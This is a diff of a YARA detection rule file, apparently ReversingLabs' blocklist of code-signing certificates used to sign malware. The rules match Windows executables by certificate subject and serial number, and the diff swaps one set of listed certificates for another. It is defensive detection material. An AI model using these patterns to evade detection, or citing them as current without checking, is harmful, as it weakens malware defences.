"https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L16944-L16960" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "d634af0637c3349fe1718ee807b8a75007ab46b141494331901a22ce54e9fc5d" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L11086-L11102" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "1ad4adf8b05a6cc065d289e6963480d37a92712a318744a30a16aad22380f238" score = 75 quality = 90 tags = "INFO, FILE" @@ -23587,22 +43378,22 @@ rule REVERSINGLABS_Cert_Blocklist_33412168Eeb3C0E4C7Dd0508A9Ffecd5 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Beijing Caiyunshidai Technology Co., Ltd." and pe.signatures[i].serial=="33:41:21:68:ee:b3:c0:e4:c7:dd:05:08:a9:ff:ec:d5" and 1467590400<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "C.W.D. INSTAL LTD" and pe.signatures[i].serial=="26:42:fe:86:5f:75:66:ce:31:23:a5:14:2c:20:70:94" and 1666310400<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_422Ab71Ac7Fb125Ad7171B0C99510B0E : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_4A2E337Fff23E5B2A1321Ffde56D1759 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "002e344e-a073-5d00-9488-d73fad51c66a" + id = "e5cae614-eff1-5c3d-a7f6-c41b0a2c412e" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L16962-L16978" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "7366e5064a9a9f66260730575327e404eadea096ba3f6cf28c83c47bef9bca58" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L11104-L11120" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "bc2df95ddf1ef3d5f83d14852e1cf6cbf4b71bfbe88fc97c2a4553e8581ddf47" score = 75 quality = 90 tags = "INFO, FILE" @@ -23612,22 +43403,22 @@ rule REVERSINGLABS_Cert_Blocklist_422Ab71Ac7Fb125Ad7171B0C99510B0E : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Xin Zhou" and pe.signatures[i].serial=="42:2a:b7:1a:c7:fb:12:5a:d7:17:1b:0c:99:51:0b:0e" and 1475193600<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Karolina Klimowska" and pe.signatures[i].serial=="4a:2e:33:7f:ff:23:e5:b2:a1:32:1f:fd:e5:6d:17:59" and 1660314070<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_6F18946E5B773B7E32D9E7B4Fb8D434C : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_92D9B92F8Cf7A1Ba8B2C025Be730C300 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "53205508-568c-5356-9717-2915c8f3806c" + id = "bc37efaa-9ceb-5079-999f-b3d17c585b1c" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L16980-L16996" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "fa285c17b43d1acdb05888074ecb16047209ade8f7f6191274f58eca7438dadf" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L11122-L11140" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "2a0be6157e589705ad19756971bd865edad2d54760d03c2e6f47a461b402ad68" score = 75 quality = 90 tags = "INFO, FILE" @@ -23637,22 +43428,22 @@ rule REVERSINGLABS_Cert_Blocklist_6F18946E5B773B7E32D9E7B4Fb8D434C : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "VECTOR LLC (VEKTOR, OOO)" and pe.signatures[i].serial=="6f:18:94:6e:5b:77:3b:7e:32:d9:e7:b4:fb:8d:43:4c" and 1454716800<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "UPLagga Systems s.r.o." and (pe.signatures[i].serial=="00:92:d9:b9:2f:8c:f7:a1:ba:8b:2c:02:5b:e7:30:c3:00" or pe.signatures[i].serial=="92:d9:b9:2f:8c:f7:a1:ba:8b:2c:02:5b:e7:30:c3:00") and 1598054400<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_3596Dfc23B9A42C66700982250Da2906 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_B8164F7143E1A313003Ab0C834562F1F : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "15c3551f-7b08-5e7f-a540-68b3eccac316" + id = "50d50330-4098-59dd-b2da-0714eefdfc66" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L16998-L17014" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "1b69bf520fde5255069cf8752d5c67716e9bc297ddde1566551a563a563197ea" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L11142-L11160" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "a42fec2e0e8d37948420f16907f39c3d502c535be98024d04a777dfbc633004d" score = 75 quality = 90 tags = "INFO, FILE" @@ -23662,22 +43453,22 @@ rule REVERSINGLABS_Cert_Blocklist_3596Dfc23B9A42C66700982250Da2906 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Open Source Developer, Song WU" and pe.signatures[i].serial=="35:96:df:c2:3b:9a:42:c6:67:00:98:22:50:da:29:06" and 1397219344<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Ekitai Data Inc." and (pe.signatures[i].serial=="00:b8:16:4f:71:43:e1:a3:13:00:3a:b0:c8:34:56:2f:1f" or pe.signatures[i].serial=="b8:16:4f:71:43:e1:a3:13:00:3a:b0:c8:34:56:2f:1f") and 1598313600<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_486Bbddc8C5Ee99F051Ecaeb3F99D2A3 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_24E4A2B3Db6Be1007B9Ddc91995Bc0C8 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "07b43dd7-e8f1-5b14-a0f4-42294b5b597e" + id = "8e533ebf-a124-53a9-8647-6f4b40aaa066" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L17016-L17032" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "75855e26ba4e01b56a551a006e789c6032cfb02c6f6125a9bdf8becb848db5b2" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L11162-L11178" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "861691ce7bae4366f3b35d01c84bb0031b54653869f52eaccf20808b1b55d2af" score = 75 quality = 90 tags = "INFO, FILE" @@ -23687,22 +43478,22 @@ rule REVERSINGLABS_Cert_Blocklist_486Bbddc8C5Ee99F051Ecaeb3F99D2A3 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Xin Zhou" and pe.signatures[i].serial=="48:6b:bd:dc:8c:5e:e9:9f:05:1e:ca:eb:3f:99:d2:a3" and 1473292800<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "FLY BETTER s.r.o." and pe.signatures[i].serial=="24:e4:a2:b3:db:6b:e1:00:7b:9d:dc:91:99:5b:c0:c8" and 1645142400<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_11211Eea9D0D1D1A325B5Eae1B2B1951120F : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_881573Fc67Ff7395Dde5Bccfbce5B088 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "09b8b3f3-a4aa-5584-b8d0-751cc87267bf" + id = "d188c65c-ee7b-586f-95f0-8de5b506c325" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L17034-L17050" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "bafab986605be61d25a6764042937bc5d8c55196ea8ea9aa9360764d9681351b" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L11180-L11198" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "ce489a4a2f07181d6fbf295f426deeaf51310e061bac2e56d65b37eeb397ff9a" score = 75 quality = 90 tags = "INFO, FILE" @@ -23712,22 +43503,22 @@ rule REVERSINGLABS_Cert_Blocklist_11211Eea9D0D1D1A325B5Eae1B2B1951120F : INFO FI importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "LLC HERMES" and pe.signatures[i].serial=="11:21:1e:ea:9d:0d:1d:1a:32:5b:5e:ae:1b:2b:19:51:12:0f" and 1460147212<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Trade in Brasil s.r.o." and (pe.signatures[i].serial=="00:88:15:73:fc:67:ff:73:95:dd:e5:bc:cf:bc:e5:b0:88" or pe.signatures[i].serial=="88:15:73:fc:67:ff:73:95:dd:e5:bc:cf:bc:e5:b0:88") and 1620000000<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_172Fea8Cb06Ffced6Bfac7F2F6B77754 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_53E1F226Cb77574F8Fbeb5682Da091Bb : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "0890bf55-ebd5-5b68-8047-14692a5f1ae7" + id = "fe3abe27-c8c8-54b8-b031-0546c9bfda90" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L17052-L17068" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "8e1e3e7d002ce084600c5444dc9b0bad8771370cb7919a3bb5ebc899040e4cf2" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L11200-L11216" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "591846225d5faf3ee8f3102acaad066f0187219044077bbdaf32345613b00965" score = 75 quality = 90 tags = "INFO, FILE" @@ -23737,22 +43528,22 @@ rule REVERSINGLABS_Cert_Blocklist_172Fea8Cb06Ffced6Bfac7F2F6B77754 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Xin Zhou" and pe.signatures[i].serial=="17:2f:ea:8c:b0:6f:fc:ed:6b:fa:c7:f2:f6:b7:77:54" and 1467936000<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "OdyLab Inc" and pe.signatures[i].serial=="53:e1:f2:26:cb:77:57:4f:8f:be:b5:68:2d:a0:91:bb" and 1654020559<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_3Ee50Bb98Fadca2D662A0920E76685A2 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_0772B4D1D63233D2B8771997Bc8Da5C4 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "5c35c73e-e4f6-5707-ad91-1db7c0a0ec81" + id = "fe602ac3-fa34-5056-a2cc-5ae9de728559" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L17070-L17086" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "d232923ed962fbf4a9a30890778c2380d6c6967a693c6f77c2f558bb4347e60e" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L11218-L11234" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "30586a643b29f3c943b3f35bb1639c5b9fa48ecbd776775086e35af502aa4a7a" score = 75 quality = 90 tags = "INFO, FILE" @@ -23762,22 +43553,22 @@ rule REVERSINGLABS_Cert_Blocklist_3Ee50Bb98Fadca2D662A0920E76685A2 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "ABDULKADIR SAHIN" and pe.signatures[i].serial=="3e:e5:0b:b9:8f:ad:ca:2d:66:2a:09:20:e7:66:85:a2" and 1330041600<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Maya logistika d.o.o." and pe.signatures[i].serial=="07:72:b4:d1:d6:32:33:d2:b8:77:19:97:bc:8d:a5:c4" and 1637971201<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_21Bfddb6A66435D1Adce2Ceb23Ed7C9A : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_02B6656292310B84022Db5541Bc48Faf : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "2009c47b-8a15-50fd-a229-5e34244ede1f" + id = "d679238f-a697-5322-815c-9986c9d24032" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L17088-L17104" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "22ad68974a1c6729da369c26372ba93c25ddf68df880580c727bf2d3ee2d3a86" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L11236-L11252" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "40b570b28e10ebd2a1ba515dc3fa45bdb5c0b76044e4dda7a6819976072a67a2" score = 75 quality = 90 tags = "INFO, FILE" @@ -23787,22 +43578,22 @@ rule REVERSINGLABS_Cert_Blocklist_21Bfddb6A66435D1Adce2Ceb23Ed7C9A : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "\\xE6\\x9D\\xA8\\xE6\\xB7\\x87\\xE6\\x99\\xBA" and pe.signatures[i].serial=="21:bf:dd:b6:a6:64:35:d1:ad:ce:2c:eb:23:ed:7c:9a" and 1395297334<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "DILA d.o.o." and pe.signatures[i].serial=="02:b6:65:62:92:31:0b:84:02:2d:b5:54:1b:c4:8f:af" and 1613865600<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_5B1C3F7Bbaa91Ca49B06A5C1004Ee5Be : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_64C2505C7306639Fc8Eae544B0305338 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "b78e7f2b-8122-5df6-ad79-393db9e0498d" + id = "b0e4057f-a0e7-5e2e-a47f-dc8188b6b506" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L17106-L17122" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "9a8d9acc87668a6fbd9fdd52b6ef69d18de8f19d8f3d3ca8eeb630c6e8c25c65" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L11254-L11270" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "9b6fb002d603135391958668be0ef805e441928a035c9c4da4bb9915aa3086e8" score = 75 quality = 90 tags = "INFO, FILE" @@ -23812,22 +43603,22 @@ rule REVERSINGLABS_Cert_Blocklist_5B1C3F7Bbaa91Ca49B06A5C1004Ee5Be : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Jin Yuguang" and pe.signatures[i].serial=="5b:1c:3f:7b:ba:a9:1c:a4:9b:06:a5:c1:00:4e:e5:be" and 1440643213<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "MANILA Solution as" and pe.signatures[i].serial=="64:c2:50:5c:73:06:63:9f:c8:ea:e5:44:b0:30:53:38" and 1609418043<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_0A2089 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_2F96A89Bfec6E44Dd224E8Fd7E72D9Bb : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "51e603bb-ef21-55e8-8f2b-94865f1213c9" + id = "bdca8435-c1fd-598d-bd82-20a3a3b2a959" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L17124-L17140" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "07ce4d39af1e56fbbfa400cf139956826999043480f93c0fc43ed056f6420d7f" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L11272-L11288" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "c0c8e5c0e2e120ee6b055e9a6b2af3d424bed0832c2619beab658fe01757f69f" score = 75 quality = 90 tags = "INFO, FILE" @@ -23837,22 +43628,22 @@ rule REVERSINGLABS_Cert_Blocklist_0A2089 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "RocketMedia S.r.l." and pe.signatures[i].serial=="0a:20:89" and 1050073884<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "NAILS UNLIMITED LIMITED" and pe.signatures[i].serial=="2f:96:a8:9b:fe:c6:e4:4d:d2:24:e8:fd:7e:72:d9:bb" and 1625529600<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_1F84E030A0Ed10D5Ffe2B81B : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_B649A966410F62999C939384Af553919 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "170dae5a-ed7e-5f20-9ccd-94724e4b2084" + id = "03533c22-eb16-546c-af55-675af9c833ce" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L17142-L17158" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "097655cb2965ae71efb905ddf20ed30c240d25e03d08a1b6c87b472533ccc9d8" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L11290-L11308" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "623a2f931198eacf44fd233065e96a4dcadb5b3bbc7ca56df2b6ae9eafc4faa5" score = 75 quality = 90 tags = "INFO, FILE" @@ -23862,22 +43653,22 @@ rule REVERSINGLABS_Cert_Blocklist_1F84E030A0Ed10D5Ffe2B81B : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "VANKY TECHNOLOGY LIMITED" and pe.signatures[i].serial=="1f:84:e0:30:a0:ed:10:d5:ff:e2:b8:1b" and 1476869735<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "F.A.T. SARL" and (pe.signatures[i].serial=="00:b6:49:a9:66:41:0f:62:99:9c:93:93:84:af:55:39:19" or pe.signatures[i].serial=="b6:49:a9:66:41:0f:62:99:9c:93:93:84:af:55:39:19") and 1590537600<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_88346267057C0A82E2F39851D1B9694C : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_45245Eef53Fcf38169C715Cf68F44452 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "3be920eb-7b71-53c4-94b7-0ffc88d14c59" + id = "514eac5a-9264-58ef-b4ee-65ec24b43e5a" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L17160-L17178" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "60acdbad8ad3e1d4a863ce160d93abd0b5e2b214858cba84f7a1b907d2491486" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L11310-L11326" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "7e0c3147e657802e457f6df271b7f5a64c81fd13f936a8935aa991022e4ab238" score = 75 quality = 90 tags = "INFO, FILE" @@ -23887,22 +43678,22 @@ rule REVERSINGLABS_Cert_Blocklist_88346267057C0A82E2F39851D1B9694C : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Hudson LLC" and (pe.signatures[i].serial=="00:88:34:62:67:05:7c:0a:82:e2:f3:98:51:d1:b9:69:4c" or pe.signatures[i].serial=="88:34:62:67:05:7c:0a:82:e2:f3:98:51:d1:b9:69:4c") and 1595376000<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "PAPER AND CORE SUPPLIES LTD" and pe.signatures[i].serial=="45:24:5e:ef:53:fc:f3:81:69:c7:15:cf:68:f4:44:52" and 1639958400<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_A46F9D8784778Baa48167C48Bbc56F30 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_1895433Ee9E2Bd48619D75132262616F : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "72d36a5f-6599-5456-ac67-0589e37bd035" + id = "d7bf59df-708c-5260-bc98-1a86b2c9c988" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L17180-L17198" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "fffb6309355bc6764b0ab033db5964599c86c9a2f6d8985975a07f6b3ebb40ed" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L11328-L11344" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "f00a29ff5dddae40225ab62cb2d4b9dec1539ad58c8cd27d686480eecdb3e31d" score = 75 quality = 90 tags = "INFO, FILE" @@ -23912,22 +43703,22 @@ rule REVERSINGLABS_Cert_Blocklist_A46F9D8784778Baa48167C48Bbc56F30 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Mapping OOO" and (pe.signatures[i].serial=="00:a4:6f:9d:87:84:77:8b:aa:48:16:7c:48:bb:c5:6f:30" or pe.signatures[i].serial=="a4:6f:9d:87:84:77:8b:aa:48:16:7c:48:bb:c5:6f:30") and 1618963200<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Evetrans Ltd" and pe.signatures[i].serial=="18:95:43:3e:e9:e2:bd:48:61:9d:75:13:22:62:61:6f" and 1619789516<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_525B5529Db20D17A85Be284D6B7952Ea : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_1Ffc9825644Caf5B1F521780C5C7F42C : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "52cdf082-7212-53e6-9e55-b86153e6afe8" + id = "3d806d90-e029-5521-b191-6967e2691c0f" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = 